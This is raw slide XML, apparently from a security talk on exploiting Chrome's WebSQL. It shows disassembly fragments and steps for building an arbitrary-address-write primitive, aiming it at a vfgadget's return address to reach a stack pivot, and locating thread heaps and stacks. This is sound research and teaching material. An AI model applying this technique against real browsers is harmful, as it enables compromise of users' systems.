                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rcx+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0Ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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shl</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rdx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a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4</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movsxd</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rax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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rax+rdx+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x818 =&gt; 0</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mov</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rdx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a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>28h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdx+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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rax</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rcx+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0Ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</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BDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retn</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" kern="100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279917" y="1825625"/>
            <a:ext cx="5617029" cy="4855093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Match puzzle to create an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAW primitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Next question : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where to AAW…?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="605097480"/>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Plan</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Target the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>return address of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vfgadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>After the AAW, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>vfgadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> function will return… into the stack pivot!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>How to find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exact location of the return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3812567894"/>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Finding the return address</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pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find the main thread heap</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Find the main thread stack</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Find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> thread stack</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Calculate the return address in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> thread stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="499863452"/>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Finding the return address</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pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find the main thread heap</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Find the main thread stack</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Find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> thread stack</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Calculate the return address in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> thread stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315617" y="2239345"/>
            <a:ext cx="10466614"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The main thread heap grows right behind the Chrome image</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49677266"/>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Finding the return address</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pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find the main thread heap</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Find the main thread stack</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Find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> thread stack</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Calculate the return address in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> thread stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315617" y="2239345"/>
            <a:ext cx="10466614"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The main thread heap grows right behind the Chrome image</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315617" y="3142003"/>
            <a:ext cx="10466614" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Several main thread stack addresses are sprinkled in the main thread heap</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2212148310"/>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Finding the return address</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pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find the main thread heap</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Find the main thread stack</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Find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> thread stack</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Calculate the return address in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> thread stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315617" y="2239345"/>
            <a:ext cx="10466614"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The main thread heap grows right behind the Chrome image</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315617" y="3142003"/>
            <a:ext cx="10466614"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Several main thread stack addresses are sprinkled in the main thread heap</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315617" y="4081985"/>
            <a:ext cx="10466614"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a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Several </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addresses are sprinkled in the main thread </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1267663042"/>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Finding the return address</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pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find the main thread heap</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Find the main thread stack</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Find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> thread stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Calculate the return address in the </a:t>
            </a:r>
            <a:r>
